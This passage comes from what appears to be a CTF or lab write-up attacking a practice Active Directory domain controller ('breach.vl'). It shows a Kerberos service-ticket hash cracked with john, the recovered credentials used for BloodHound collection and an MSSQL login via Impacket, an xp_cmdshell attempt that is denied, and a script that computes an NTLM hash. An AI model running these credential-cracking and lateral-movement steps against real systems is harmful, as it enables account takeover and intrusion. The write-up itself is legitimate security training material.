322fc3b65f39feeb9d7a10a028775bded0c1164eda3e3723d45d4986f4d7afe53905b03590ac81bfdcff20bcfb9aaa5ba7c38601aaa42a9b4c3b8eec1c01ba70558f90df472faa</code></pre></div><p>We got one, it belongs to SVC_MSSQL:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ john out.hash --wordlist=/usr/share/wordlists/rockyou.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Trustno1         (?)     
1g 0:00:00:00 DONE (2026-04-01 10:08) 11.11g/s 580266p/s 580266c/s 580266C/s chloelouise..lili12
Use the "--show" option to display all of the cracked passwords reliably
Session completed.</code></pre></div><p>So we found another pair of &#8220;Trustno1&#8220;, leaving us another pair of credential:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">user: svc_mssql
passwd: Trustno1</code></pre></div><p>PS: SVC_MSSQL also don&#8217;t have password re-use case. So now. . .We BloodHound!!</p><ol start="5"><li><p><em>Active Directory BloodHound</em></p></li></ol><p>We already have 2 valid users, might as-well check maybe some vuln ACL or access we can abuse.</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ sudo netexec ldap breachdc.breach.vl -u svc_mssql -p Trustno1 --bloodhound -c all --dns-server 10.129.11.224
LDAP        10.129.11.224   389    BREACHDC         [*] Windows Server 2022 Build 20348 (name:BREACHDC) (domain:breach.vl) (signing:None) (channel binding:No TLS cert) 
LDAP        10.129.11.224   389    BREACHDC         [+] breach.vl\svc_mssql:Trustno1 
LDAP        10.129.11.224   389    BREACHDC         Resolved collection methods: objectprops, acl, container, rdp, trusts, session, localadmin, dcom, group, psremote
LDAP        10.129.11.224   389    BREACHDC         Done in 0M 48S
LDAP        10.129.11.224   389    BREACHDC         Compressing output into /root/.nxc/logs/BREACHDC_10.129.11.224_2026-04-01_101118_bloodhound.zip</code></pre></div><p>For Julia.Wong:</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!EKXr!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa04e5238-64d0-4824-b7ab-7580dbf6f18e_1590x965.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!EKXr!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa04e5238-64d0-4824-b7ab-7580dbf6f18e_1590x965.png 424w, https://substackcdn.com/image/fetch/$s_!EKXr!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa04e5238-64d0-4824-b7ab-7580dbf6f18e_1590x965.png 848w, https://substackcdn.com/image/fetch/$s_!EKXr!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa04e5238-64d0-4824-b7ab-7580dbf6f18e_1590x965.png 1272w, https://substackcdn.com/image/fetch/$s_!EKXr!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa04e5238-64d0-4824-b7ab-7580dbf6f18e_1590x965.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!EKXr!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa04e5238-64d0-4824-b7ab-7580dbf6f18e_1590x965.png" width="1456" height="884" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/a04e5238-64d0-4824-b7ab-7580dbf6f18e_1590x965.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:884,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:180637,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/192855357?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa04e5238-64d0-4824-b7ab-7580dbf6f18e_1590x965.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!EKXr!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa04e5238-64d0-4824-b7ab-7580dbf6f18e_1590x965.png 424w, https://substackcdn.com/image/fetch/$s_!EKXr!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa04e5238-64d0-4824-b7ab-7580dbf6f18e_1590x965.png 848w, https://substackcdn.com/image/fetch/$s_!EKXr!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa04e5238-64d0-4824-b7ab-7580dbf6f18e_1590x965.png 1272w, https://substackcdn.com/image/fetch/$s_!EKXr!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa04e5238-64d0-4824-b7ab-7580dbf6f18e_1590x965.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>There&#8217;s nothing interesting, so let&#8217;s see the other one.</p><p>SVC_MSSQL:</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!KpDM!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Faf5cce8b-a3a6-4a1f-bfd3-2498656bc982_1590x965.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!KpDM!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Faf5cce8b-a3a6-4a1f-bfd3-2498656bc982_1590x965.png 424w, https://substackcdn.com/image/fetch/$s_!KpDM!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Faf5cce8b-a3a6-4a1f-bfd3-2498656bc982_1590x965.png 848w, https://substackcdn.com/image/fetch/$s_!KpDM!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Faf5cce8b-a3a6-4a1f-bfd3-2498656bc982_1590x965.png 1272w, https://substackcdn.com/image/fetch/$s_!KpDM!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Faf5cce8b-a3a6-4a1f-bfd3-2498656bc982_1590x965.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!KpDM!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Faf5cce8b-a3a6-4a1f-bfd3-2498656bc982_1590x965.png" width="1456" height="884" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/af5cce8b-a3a6-4a1f-bfd3-2498656bc982_1590x965.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:884,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:169021,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/192855357?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Faf5cce8b-a3a6-4a1f-bfd3-2498656bc982_1590x965.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!KpDM!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Faf5cce8b-a3a6-4a1f-bfd3-2498656bc982_1590x965.png 424w, https://substackcdn.com/image/fetch/$s_!KpDM!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Faf5cce8b-a3a6-4a1f-bfd3-2498656bc982_1590x965.png 848w, https://substackcdn.com/image/fetch/$s_!KpDM!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Faf5cce8b-a3a6-4a1f-bfd3-2498656bc982_1590x965.png 1272w, https://substackcdn.com/image/fetch/$s_!KpDM!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Faf5cce8b-a3a6-4a1f-bfd3-2498656bc982_1590x965.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>This guy didn&#8217;t have any OOB at the moment, but quite dangerous due to having an SPN, leading to potential Administrator cache theft.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!GmOL!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1ae8a4ee-98a3-42e3-a669-25a45c7f360f_1590x965.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!GmOL!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1ae8a4ee-98a3-42e3-a669-25a45c7f360f_1590x965.png 424w, https://substackcdn.com/image/fetch/$s_!GmOL!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1ae8a4ee-98a3-42e3-a669-25a45c7f360f_1590x965.png 848w, https://substackcdn.com/image/fetch/$s_!GmOL!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1ae8a4ee-98a3-42e3-a669-25a45c7f360f_1590x965.png 1272w, https://substackcdn.com/image/fetch/$s_!GmOL!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1ae8a4ee-98a3-42e3-a669-25a45c7f360f_1590x965.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!GmOL!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1ae8a4ee-98a3-42e3-a669-25a45c7f360f_1590x965.png" width="1590" height="965" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/1ae8a4ee-98a3-42e3-a669-25a45c7f360f_1590x965.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:965,&quot;width&quot;:1590,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:169163,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/192855357?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6e5762c2-eb48-4016-a656-7f87cd4b548b_1590x965.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!GmOL!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1ae8a4ee-98a3-42e3-a669-25a45c7f360f_1590x965.png 424w, https://substackcdn.com/image/fetch/$s_!GmOL!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1ae8a4ee-98a3-42e3-a669-25a45c7f360f_1590x965.png 848w, https://substackcdn.com/image/fetch/$s_!GmOL!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1ae8a4ee-98a3-42e3-a669-25a45c7f360f_1590x965.png 1272w, https://substackcdn.com/image/fetch/$s_!GmOL!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1ae8a4ee-98a3-42e3-a669-25a45c7f360f_1590x965.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>Another PS:</p><p>The two account we&#8217;ve compromised much can access: LDAP, SMB, MSSQL, RDP, etc.</p><p>So the next plan is to see if SVC_MSSQL can gain an impersonation, leading to further access on MSSQL (Test manually it&#8217;s weak) such as Admin, and get access into the box.</p><ol start="6"><li><p><em>MSSQL Enumeration and Abuse</em></p></li></ol><p>Much here we going to use:</p><ul><li><p>NetExec</p></li><li><p>Impacket</p></li></ul><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ sudo netexec mssql breachdc.breach.vl -u svc_mssql -p Trustno1
MSSQL       10.129.11.224   1433   BREACHDC         [*] Windows Server 2022 Build 20348 (name:BREACHDC) (domain:breach.vl) (EncryptionReq:False)
MSSQL       10.129.11.224   1433   BREACHDC         [+] breach.vl\svc_mssql:Trustno1</code></pre></div><p>Logon</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ sudo impacket-mssqlclient svc_mssql:Trustno1@breachdc.breach.vl -windows-auth
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
. . .[SNIP]. . .
ERROR(BREACHDC\SQLEXPRESS): Line 1: The EXECUTE permission was denied on the object 'xp_cmdshell', database 'mssqlsystemresource', schema 'sys'.
SQL (BREACH\svc_mssql  guest@master)&gt; enum_logins
name            type_desc       is_disabled   sysadmin   securityadmin   serveradmin   setupadmin   processadmin   diskadmin   dbcreator   bulkadmin   
-------------   -------------   -----------   --------   -------------   -----------   ----------   ------------   ---------   ---------   ---------   
sa              SQL_LOGIN                 1          1               0             0            0              0           0           0           0   
BUILTIN\Users   WINDOWS_GROUP             0          0               0             0            0              0           0           0           0   
SQL (BREACH\svc_mssql  guest@master)&gt;</code></pre></div><p>Let&#8217;s use the BloodHound SPN map suggestor.</p><p>So now I&#8217;m going to change SVC_MSSQL password into MD4 (NT) portion as logon with:</p><ul><li><p><a href="https://gist.github.com/byt3n33dl3/2f719df2e45df933b74ac7f218c25e4a">gist.github.com/byt3n33dl3/2f719df2e45df933b74ac7f218c25e4a</a></p></li></ul><div class="github-gist" data-attrs="{&quot;innerHTML&quot;:&quot;<div id=\&quot;gist144599464\&quot; class=\&quot;gist\&quot;>\n    <div class=\&quot;gist-file\&quot; translate=\&quot;no\&quot; data-color-mode=\&quot;light\&quot; data-light-theme=\&quot;light\&quot;>\n      <div class=\&quot;gist-data\&quot;>\n        \n<div class=\&quot;js-gist-file-update-container js-task-list-container\&quot;>\n      <div id=\&quot;file-hash_convert-py\&quot; class=\&quot;file my-2\&quot;>\n    \n    <div itemprop=\&quot;text\&quot;\n      class=\&quot;Box-body p-0 blob-wrapper data type-python  \&quot;\n      style=\&quot;overflow: auto\&quot; tabindex=\&quot;0\&quot; role=\&quot;region\&quot;\n      aria-label=\&quot;hash_convert.py content, created by byt3n33dl3 on 01:55PM on January 18.\&quot;\n    >\n\n        \n<div class=\&quot;js-check-hidden-unicode js-blob-code-container blob-code-content\&quot;>\n\n  <template class=\&quot;js-file-alert-template\&quot;>\n  <div data-view-component=\&quot;true\&quot; class=\&quot;flash flash-warn flash-full d-flex flex-items-center\&quot;>\n  <svg aria-hidden=\&quot;true\&quot; height=\&quot;16\&quot; viewBox=\&quot;0 0 16 16\&quot; version=\&quot;1.1\&quot; width=\&quot;16\&quot; data-view-component=\&quot;true\&quot; class=\&quot;octicon octicon-alert\&quot;>\n    <path d=\&quot;M6.457 1.047c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0 1 14.082 15H1.918a1.75 1.75 0 0 1-1.543-2.575Zm1.763.707a.25.25 0 0 0-.44 0L1.698 13.132a.25.25 0 0 0 .22.368h12.164a.25.25 0 0 0 .22-.368Zm.53 3.996v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 1.5 0ZM9 11a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z\&quot;></path>\n</svg>\n    <span>\n      This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.\n      <a class=\&quot;Link--inTextBlock\&quot; href=\&quot;https://github.co/hiddenchars\&quot; target=\&quot;_blank\&quot;>Learn more about bidirectional Unicode characters</a>\n    </span>\n\n\n  <div data-view-component=\&quot;true\&quot; class=\&quot;flash-action\&quot;>        <a href=\&quot;{{ revealButtonHref }}\&quot; data-view-component=\&quot;true\&quot; class=\&quot;btn-sm btn\&quot;>    Show hidden characters\n</a>\n</div>\n</div></template>\n<template class=\&quot;js-line-alert-template\&quot;>\n  <span aria-label=\&quot;This line has hidden Unicode characters\&quot; data-view-component=\&quot;true\&quot; class=\&quot;line-alert tooltipped tooltipped-e\&quot;>\n    <svg aria-hidden=\&quot;true\&quot; height=\&quot;16\&quot; viewBox=\&quot;0 0 16 16\&quot; version=\&quot;1.1\&quot; width=\&quot;16\&quot; data-view-component=\&quot;true\&quot; class=\&quot;octicon octicon-alert\&quot;>\n    <path d=\&quot;M6.457 1.047c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0 1 14.082 15H1.918a1.75 1.75 0 0 1-1.543-2.575Zm1.763.707a.25.25 0 0 0-.44 0L1.698 13.132a.25.25 0 0 0 .22.368h12.164a.25.25 0 0 0 .22-.368Zm.53 3.996v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 1.5 0ZM9 11a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z\&quot;></path>\n</svg>\n</span></template>\n\n  <table data-hpc class=\&quot;highlight tab-size js-file-line-container\&quot; data-tab-size=\&quot;4\&quot; data-paste-markdown-skip data-tagsearch-path=\&quot;hash_convert.py\&quot;>\n        <tr>\n          <td id=\&quot;file-hash_convert-py-L1\&quot; class=\&quot;blob-num js-line-number js-blob-rnum\&quot; data-line-number=\&quot;1\&quot;></td>\n          <td id=\&quot;file-hash_convert-py-LC1\&quot; class=\&quot;blob-code blob-code-inner js-file-line\&quot;><span class=pl-k>import</span> <span class=pl-s1>hashlib</span></td>\n        </tr>\n        <tr>\n          <td id=\&quot;file-hash_convert-py-L2\&quot; class=\&quot;blob-num js-line-number js-blob-rnum\&quot; data-line-number=\&quot;2\&quot;></td>\n          <td id=\&quot;file-hash_convert-py-LC2\&quot; class=\&quot;blob-code blob-code-inner js-file-line\&quot;><span class=pl-s1>password</span> <span class=pl-c1>=</span> <span class=pl-s>&amp;quot;Passw0rd1&amp;quot;</span></td>\n        </tr>\n        <tr>\n          <td id=\&quot;file-hash_convert-py-L3\&quot; class=\&quot;blob-num js-line-number js-blob-rnum\&quot; data-line-number=\&quot;3\&quot;></td>\n          <td id=\&quot;file-hash_convert-py-LC3\&quot; class=\&quot;blob-code blob-code-inner js-file-line\&quot;><span class=pl-s1>ntlm_hash</span> <span class=pl-c1>=</span> <span class=pl-s1>hashlib</span>.<span class=pl-c1>new</span>(<span class=pl-s>&amp;#39;md4&amp;#39;</span>, <span class=pl-s1>password</span>.<span class=pl-c1>encode</span>(<span class=pl-s>&amp;#39;utf-16le&amp;#39;</span>)).<span class=pl-c1>hexdigest</span>()</td>\n        </tr>\n        <tr>\n          <td id=\&quot;file-hash_convert-py-L4\&quot; class=\&quot;blob-num js-line-number js-blob-rnum\&quot; data-line-number=\&quot;4\&quot;></td>\n          <td id=\&quot;file-hash_convert-py-LC4\&quot; class=\&quot;blob-code blob-code-inner js-file-line\&quot;><span class=pl-en>print</span>(<span class=pl-s>f&amp;quot;NTLM Hash: <span class=pl-s1><span class=pl-kos>{</span><span class=pl-s1>ntlm_hash</span><span class=pl-kos>}</span></span>&amp;quot;</span>)</td>\n        </tr>\n  </table>\n</div>\n\n\n    </div>\n\n  </div>\n\n</div>\n\n      </div>\n      <div class=\&quot;gist-meta\&quot;>\n        <a href=\&quot;https://gist.github.com/byt3n33dl3/2f719df2e45df933b74ac7f218c25e4a/raw/db2bab4897a950883eb551353ca8dc151f6dc817/hash_convert.py\&quot; style=\&quot;float:right\&quot; class=\&quot;Link--inTextBlock\&quot;>view raw</a>\n        <a href=\&quot;https://gist.github.com/byt3n33dl3/2f719df2e45df933b74ac7f218c25e4a#file-hash_convert-py\&quot; class=\&quot;Link--inTextBlock\&quot;>\n          hash_convert.py\n        </a>\n        hosted with &amp;#10084; by <a class=\&quot;Link--inTextBlock\&quot; href=\&quot;https://github.com\&quot;>GitHub</a>\n      </div>\n    </div>\n</div>\n&quot;,&quot;stylesheet&quot;:&quot;https://github.githubassets.com/assets/gist-embed-62c2e4e96ba476b5.css&quot;}" data-component-name="GitgistToDOM"><link rel="stylesheet" href="https://github.githubassets.com/assets/gist-embed-62c2e4e96ba476b5.css"><div id="gist144599464" class="gist">
    <div class="gist-file" data-color-mode="light" data-light-theme="light">
      <div class="gist-data">
        
<div class="js-gist-file-update-container js-task-list-container">
      <div id="file-hash_convert-py" class="file my-2">
    
    <div itemprop="text" class="Box-body p-0 blob-wrapper data type-python  " style="overflow:auto">

        
<div class="js-check-hidden-unicode js-blob-code-container blob-code-content">

  
  <div data-view-component="true" class="flash flash-warn flash-full d-flex flex-items-center">
  
    

    <span>
      This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
      <a class="Link--inTextBlock" href="https://github.co/hiddenchars" target="_blank">Learn more about bidirectional Unicode characters</a>
    </span>


  <div data-view-component="true" class="flash-action">        <a href="{{ revealButtonHref }}" data-view-component="true" class="btn-sm btn">    Show hidden characters
</a>
</div>
</div>

  <span data-view-component="true" class="line-alert tooltipped tooltipped-e">
    
    

</span>

  <table data-hpc="" class="highlight tab-size js-file-line-container" data-tab-size="4" data-paste-markdown-skip="" data-tagsearch-path="hash_convert.py">
        <tbody><tr>
          <td id="file-hash_convert-py-L1" class="blob-num js-line-number js-blob-rnum" data-line-number="1"></td>
          <td id="file-hash_convert-py-LC1" class="blob-code blob-code-inner js-file-line"><span class="pl-k">import</span> <span class="pl-s1">hashlib</span></td>
        </tr>
        <tr>
          <td id="file-hash_convert-py-L2" class="blob-num js-line-number js-blob-rnum" data-line-number="2"></td>
          <td id="file-hash_convert-py-LC2" class="blob-code blob-code-inner js-file-line"><span class="pl-s1">password</span> <span class="pl-c1">=</span> <span class="pl-s">"Passw0rd1"</span></td>
        </tr>
        <tr>
